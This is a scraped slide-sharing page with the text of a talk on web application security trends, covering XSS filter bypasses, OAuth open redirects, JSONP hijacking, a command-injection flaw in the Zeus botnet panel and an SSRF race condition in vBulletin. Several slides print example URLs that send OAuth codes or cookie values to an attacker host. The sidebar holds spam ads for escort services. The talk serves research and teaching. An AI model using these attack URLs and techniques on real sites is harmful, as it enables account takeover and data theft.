Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaults
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
 
How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?
 
Play,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingPlay,Learn and Hack- CTF Training
Play,Learn and Hack- CTF Training
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017 OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 
Bank One App Sec Training
Bank One App Sec TrainingBank One App Sec Training
Bank One App Sec Training
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
 
Agile Network India | DevSecOps - The What and the Why | Ritesh Shregill
Agile Network India | DevSecOps - The What and the Why | Ritesh ShregillAgile Network India | DevSecOps - The What and the Why | Ritesh Shregill
Agile Network India | DevSecOps - The What and the Why | Ritesh Shregill
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 

Mais de beched

Attacks against machine learning algorithms
Attacks against machine learning algorithmsAttacks against machine learning algorithms
Attacks against machine learning algorithmsbeched
 
Hacking as eSports
Hacking as eSportsHacking as eSports
Hacking as eSportsbeched
 
BlackBox testing
BlackBox testingBlackBox testing
BlackBox testingbeched
 
Пост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновениеПост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновениеbeched
 
Что общего у CTF и тестов на проникновение?
Что общего у CTF и тестов на проникновение?Что общего у CTF и тестов на проникновение?
Что общего у CTF и тестов на проникновение?beched
 
Алгоритмы пентестов. BaltCTF 2012
Алгоритмы пентестов. BaltCTF 2012Алгоритмы пентестов. BaltCTF 2012
Алгоритмы пентестов. BaltCTF 2012beched
 

Mais de beched (6)

Attacks against machine learning algorithms
Attacks against machine learning algorithmsAttacks against machine learning algorithms
Attacks against machine learning algorithms
 
Hacking as eSports
Hacking as eSportsHacking as eSports
Hacking as eSports
 
BlackBox testing
BlackBox testingBlackBox testing
BlackBox testing
 
Пост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновениеПост-эксплуатация веб-приложений в тестах на проникновение
Пост-эксплуатация веб-приложений в тестах на проникновение
 
Что общего у CTF и тестов на проникновение?
Что общего у CTF и тестов на проникновение?Что общего у CTF и тестов на проникновение?
Что общего у CTF и тестов на проникновение?
 
Алгоритмы пентестов. BaltCTF 2012
Алгоритмы пентестов. BaltCTF 2012Алгоритмы пентестов. BaltCTF 2012
Алгоритмы пентестов. BaltCTF 2012
 

Último

call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
Active Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdfActive Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdfCionsystems
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
Test Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and BackendTest Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and BackendArshad QA
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 

Último (20)

call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Active Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdfActive Directory Penetration Testing, cionsystems.com.pdf
Active Directory Penetration Testing, cionsystems.com.pdf
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Test Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and BackendTest Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and Backend
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 

Owasp web application security trends

  • 2. Hi! I’m Beched, and I love hacking an solving problems. Let’s observe overall trends and some recently published papers, vulnerabilities and techniques, connected with web application security.
  • 3. Classification Questions to classify the vulnerabilities: • Is the exploitation technique new or known? • Is the attack target new or known technology? • How large is a potential attack surface?
  • 4. Sourcesof news • Bug trackers, mailing lists • https://blackhat.com/html/archives.html • https://blog.whitehatsec.com/top-10-web- hacking-techniques-2013/ • https://blog.whitehatsec.com/top-10-web- hacking-techniques-of-2014/ • …
  • 5. Community opinion • 30.77% of respondents from rdot.org will go to dance a ballet, because web hacking is gonna become way too complex =)
  • 6. Obvious remarks • Growth of security awareness of developers makes their code more secure • At the same time new products and technologies are often released without careful security audit • Old software is often considered as safe and trusty but contains severe vulnerabilities • Business logic bugs are alive
  • 7. Obvious remarks • Infosec is part of CS and IT, and it inherits global trends • The global trend is a wide spread of various gadgets and mobile devices • The global trend is making houses and vehicles smart • The global trend is making web interfaces rich and self-contained in the browsers
  • 8. Take a look • There’re loads of papers and presentations at BlackHat archives. If we filter those, which are connected with web security, and range the topics, we get the following scoreboard of trends: • client-side && mobile • clouds && big data && social networks • misc && classic • TLS && SSL • IoT && routers • PRNG && SSRF && etc • old soft
  • 9. Client-side && Mobile • Known technologies, new life • There’re loads of papers on client-side security • Loads of bug bounties are given for XSS or something like that • There’re a lot of tricky techniques, and we can see a long war between browser developers and XSS hunters • Mobile browsers are also targeted. Some mobile OS interfaces are HTML5-based, which increases impact of XSS
  • 10. Client-side && Mobile DISSECTING CSRF ATTACKS & COUNTERMEASURES JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME MILLION BROWSER BOTNET PIXEL PERFECT TIMING ATTACKS WITH HTML5 ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR REVISITING XSS SANITIZATION SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS TWO FACTOR FAILURE THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD
  • 11. Client-side && Mobile • UXSS, MXSS • ChromeOS, FirefoxOS • Browser extensions hacking • Endless security features vs bypass war • XSS Auditor, CSP, HttpOnly, SOP, CORS • Funny things like RFD (reflected file download) • OAuth bugs
  • 12. Example • Chrome XSS auditor breaks a lot of attacks, but in most cases it can be bypassed, or at least an attack can be modified • The idea is that it looks for complete tag names or attributes from the page in the HTTP request packets • There’re plenty of bypasses, take a look at http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/ http://www.thespanner.co.uk/2015/02/19/another-xss-auditor- bypass/ https://www.blackhat.com/docs/us-14/materials/us-14-Johns- Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side- XSS-Filtering.pdf
  • 13. Example • Other bypasses include CSRF tokens leakage, form target forgery, etc
  • 14. Example • Secure CMS and XSS Auditor can be spoiled with plugins • Look at this typographic plugin for Drupal: var result = Typographus_Lite_UTF8.typo_text( $(this).text() ); $(this).after(result).remove(); • JQuery method after() is insecure. As a result, div contents become HTML-decoded, and all your reflected or stored &lt;script&gt; stuff becomes active
  • 15. Example • OAuth is often vulnerable to open redirect due to lack of redirect_uri validation https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879 c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&sco pe=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257 After authorization redirects to: http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85 458d0db1c65792d52c8bef3c4407374b2 • Access token (code) value is enough for account takeover
  • 16. Clouds && Big data && Social networks • Fairly new technologies • Cloud computing and machine learning are heavily used for different purposes • As for infosec, this can be used both for attack and defense • Social networks and big data providers can be exploited for deanonymization and fraud • Machine learning can be used for building WAF
  • 17. Clouds && Big data && Social networks PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS BIG DATA FOR WEB APPLICATION SECURITY FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFIC PIVOTING IN AMAZON CLOUDS BRINGING A MACHETE TO THE AMAZON BABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALE SECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORING BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS HADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANT HOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS
  • 18. Example • Post-exploitation of distributed web applications is often a bit tricky – you don’t exactly know which node will process your request • Nodes can often be enumerated via HTTP response headers or cookies • Sometimes some nodes are not updated and contain vulnerabilities • This creates mind-blowing phantom vulnerabilities =) • Take a look at cool talk about Amazon EC2 post- exploitation: https://www.blackhat.com/docs/us- 14/materials/us-14-Riancho-Pivoting-In-Amazon- Clouds.pdf
  • 19. Example • Data providers are often used for targeted marketing. However, their data can sometimes be stolen and used for deanonymisation or fraud. This is documented API request: https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=htt p://incsecurity.ru/?adv_id=$UID • $UID will be replaced with actual cookie value by the server and will be sent to attacker host • Information about user can be obtained via JSONP hijacking, even if session id is checked.
  • 20. Example • Request: https://*.ru/api/get/?uid=$UID&success_cb=_cb_s&fail_cb=_cb_e&st =1 • Response contains information about gender, interests, etc. Part of interests description file: … { "id": "40010082", "segment": "Fetish & Bondage", "category": "Interests", "section": "Interests", "description": "“ } …
  • 21. Misc & Classic • There’re a lot of works which continue previous researches and bug reports • They improve exploitation of classical vulnerabilities like SQL injection and testing/analysis methods • The raise of penetration testing industry pushed up demand for .NET and J2EE applications hacking methods
  • 22. Misc & Classic ') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION TECHNIQUES’)%00 INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA CONTEMPORARY AUTOMATIC PROGRAM ANALYSIS FINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG IMPLEMENTATIONS I KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS! SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS
  • 23. Example • The paper about hacking C&C panels reminded me of the RCE vulnerability in Zeus C&C, which I published near 2010. I opened these links now: http://ahack.ru/bugs/zeus-vulnerability- exploit.htm https://github.com/Visgean/Zeus/ • Guess what I see there since 5 years? ;)
  • 24. Example • The name of function has changed, but vulnerability is still there, AFAICS ... function fsarcCreate($archive, $files) ... $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"'; exec($cli, $e, $r); ... foreach($_POST['files'] as $file)$list[] = $_CUR_PATH.'/'.$file; ... if(!function_exists('fsarcCreate') || ($arcfile = fsarcCreate($arcfile, $list)) === false)die('Failed to create archive, please check "system/fsarc.php" script.'); ...
  • 25. Example • This is a small example, probably there’re more critical vulnerabilities in this popular botnet C&C. BTW, how do you find vulnerabilities in the source code? • Paper on contemporary automatic program analysis mostly tells about grep =) • Personally I use grep with lovely regular expressions: w*(include|require)(_once)?[s(]+(?!s*('[^']*'|"[^"]*"| )[@s.]*(urlencode|rand|rawurlencode|basename|le venshtein|doubleval|sizeof|base64_encode|strlen|flo or|crypt|strrpos|filter_input|abs|bin2hex|bindec|has h|intval|max|decbin|strpos|crc32|ord|md5|count|sh a1|min|pathinfo|floatval|round|hexdec)s*()[^;]*$. *
  • 27. Example • 2014 has gone, and here comes 2015, but PHP and Apache are still broken • Several UAF vulnerabilities in PHP fixed recently, still a lot of restriction bypasses and RCE vulnerabilities live deep there • Apache has not yet learnt RFC • Other popular miscellaneous words among hackers: NoSQL, SSJS, SCADA, SAP
  • 28. TLS && SSL • As old as the world • There’re still a lot of misconfiguration issues with HTTPS • Also there’re a lot of scary words like BEAST, CRIME, BREACH, HeartBleed, POODLE, SSLStrip and others • Many configuration mistakes are result of trade-off between performance and security
  • 29. TLS && SSL SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME TLS 'SECRETS' TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS A PERFECT CRIME? ONLY TIME WILL TELL THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP BYPASSING HTTP STRICT TRANSPORT SECURITY
  • 30. IoT && Routers • This is one of the most popular new IT trends everyone heard about • New means untested. Untested means vulnerable • Seriously, the Internet of things is broken, and many yell about it • People hack RF protocols of alarms, people find smart houses without doors via Shodan, etc, etc
  • 31. IoT && Routers EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER HOME INVASION V2.0 - ATTACKING NETWORK- CONTROLLED HARDWARE A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS
  • 34. Example • And this (admin;admin):
  • 35. Example • BTW, side note: why doesn’t XSS Auditor perform HTTP response splitting check? • As you could see on the screenshot above, response splitting kills XSS Auditor, because we can inject header X-XSS-Protection: 0.
  • 36. PRNG && SSRF && etc • XXE, SSRF and randomness hacking were hot topics of 2012-2013 • They are popular today too, new applications and attack vectors are developed
  • 37. PRNG && SSRF && etc BLACK-BOX ASSESSMENT OF PSEUDORANDOM ALGORITHMS XML OUT-OF-BAND DATA RETRIEVAL THE NEW PAGE OF INJECTIONS BOOK: MEMCACHED INJECTIONS ICSCORSAIR: HOW I WILL PWN YOUR ERP THROUGH 4-20 MA CURRENT LOOP
  • 38. Example • Autodiscover interface in OWA reveals an internal IP address of the mail server • Ev.owa interface with cPfdDC parameter can be used to send some LDAP requests and connect to different hosts (“domain controllers”) Microsoft.Exchange.Data.Directory.SuitabilityVerifie r.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential) • If there was bypass for anti-CSRF canary, you could possibly steal NTLM credentials
  • 39. Example • vBulletin forum CMS allows to upload attachments from remote URL (class_upload.php, class_vurl.php) • First it checks the file size via HEAD request, then it downloads the file • You can use HTTP multiplexor to exploit race condition and return code 200 and valid file size for the first request and 302 redirect for the second request • Some configuration options and old versions of cURL allow file:// URL wrapper in Location header
  • 40. Old soft • We’ve witnessed several critical vulnerabilities in well-known and widely used software in 2014 • HeartBleed, GHOST, ShellShock, POODLE, goto fail, etc • Probably it’s an important moment, when we stop trusting and begin reviewing all the fundamental old software that we use everywhere
  • 41. Old soft EPIDEMIOLOGY OF SOFTWARE VULNERABILITIES: A STUDY OF ATTACK SURFACE SPREAD SSL VALIDATION CHECKING VS. GO(ING) TO FAIL
  • 42. Example • Although these famous vulnerabilities are not caused by web applications, they deeply affect them • ShellShock and GHOST affect webapp<->OS interaction layer • HeartBleed, goto fail, POODLE, affect mainly webapp<->encryption<->network interaction layer
  • 43. Example • This is another proof of why shouldn’t we consider any part of the software as trusted. Each component of the system can be broken • BTW, newspapermen also started the era of nicknames for vulnerabilities • I find this a bit ridiculous but funny =)
  • 44. Summary • The Internet is broken • The WWW is broken • Hackers gonna hack • Web applications become smarter • Hacking becomes smarter